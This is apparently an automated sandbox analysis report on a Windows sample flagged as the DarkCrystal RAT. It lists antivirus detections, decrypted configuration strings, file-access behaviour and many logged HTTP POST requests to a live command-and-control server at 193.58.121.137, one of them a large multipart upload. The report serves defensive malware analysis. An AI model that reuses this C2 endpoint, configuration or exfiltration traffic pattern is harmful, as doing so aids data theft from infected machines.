Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	ReversingLabs: Detection: 82%
Source: C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	ReversingLabs: Detection: 82%
Source: C:\Users\user\Desktop\BjUpXdep.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\BpLaswaY.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\JmTPAbOe.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\KAZQIQEM.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\KVMxlGUc.log	ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\LSnFHGjW.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\QCZpVjcx.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\RCtfAzVO.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\RTAxOVPQ.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\SzUnVzkJ.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\TnEFcwnq.log	ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\XDtENRtz.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\bhUNaLwZ.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\dwWdpxyo.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\gVlLDILN.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\lZeSZrOV.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\oGeTRkCA.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\sfNsKLIr.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\spksuybo.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\vwiBQQWj.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\wwCruhPB.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\zepZsevX.log	ReversingLabs: Detection: 29%
Source: C:\hyperComponentFontDhcp\Mscommon.exe	ReversingLabs: Detection: 82%

Multi AV Scanner detection for submitted file

Source: kJrNOFEGbQ.exe

ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\TnEFcwnq.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\JmTPAbOe.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\PIewODkQ.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AEzAQzJw.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\KVMxlGUc.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\RrReMzQm.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\LSnFHGjW.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\WGSwrSeE.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\JVsHHpbK.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\CXEIeahW.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GTFZlGXP.log	Joe Sandbox ML: detected
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: kJrNOFEGbQ.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["MMz00KmHKoJuKyp3EeVj8SRYjYE02IUoOfGVR3KK3FCkp0TVx587gtj34aRcGwOCUegorTmLULp2PqtsEtC7KWIe5Na0mrEH1AQLUoodTwnUDrnNriXXuQ27VBte3vjn","601e15a90bb00257f7c6912c3a0b56596eff0ce41f53b8f0d11a89075dccd10c","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJeElpd2lJaXdpWlhsSmQwbHFiMmxsTVU1YVZURlNSbFJWVWxOVFZscEdabE01Vm1NeVZubGplVGhwVEVOSmVFbHFiMmxrU0VveFdsTkpjMGxxU1dsUGFVb3dZMjVXYkVscGQybE5lVWsyU1c1U2VXUlhWV2xNUTBrd1NXcHZhV1JJU2pGYVUwbHpTV3BWYVU5cFNqQmpibFpzU1dsM2FVNXBTVFpKYmxKNVpGZFZhVXhEU1ROSmFtOXBaRWhLTVZwVFNYTkphbWRwVDJsS01HTnVWbXhKYVhkcFQxTkpOa2x1VW5sa1YxVnBURU5KZUUxRFNUWkpibEo1WkZkVmFVeERTWGhOVTBrMlNXNVNlV1JYVldsTVEwbDRUV2xKTmtsdVVubGtWMVZwVEVOSmVFMTVTVFpKYmxKNVpGZFZhVXhEU1hoT1EwazJTVzVTZVdSWFZXbG1VVDA5SWwwPSJd"]
Source: 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/","imageVideorequestSecureProcesstrackwpcentral"]]

Source: kJrNOFEGbQ.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: kJrNOFEGbQ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kJrNOFEGbQ.exe
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\flsapel1\flsapel1.pdb source: Mscommon.exe, 00000008.00000002.2004012692.00000000036BA000.00000004.00000800.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

System file written: C:\Windows\System32\SecurityHealthSystray.exe

Jump to behavior

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0036A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_0036A69B
Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe	Code function: 0_2_0037C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_0037C220

Source: C:\hyperComponentFontDhcp\Mscommon.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\hyperComponentFontDhcp\Mscommon.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: C:\hyperComponentFontDhcp\Mscommon.exe

Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh

8_2_00007FFD9BC8BA5D

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 193.58.121.137:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View

ASN Name: DCHASSELTBE DCHASSELTBE

Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 380Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1440Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: multipart/form-data; boundary=----6V07bb5SvJtEV85TMFuIzJ8rpxR8Ce0HWmUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 127510Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1884Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1860Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1884Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1848Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 1848Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 193.58.121.137Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
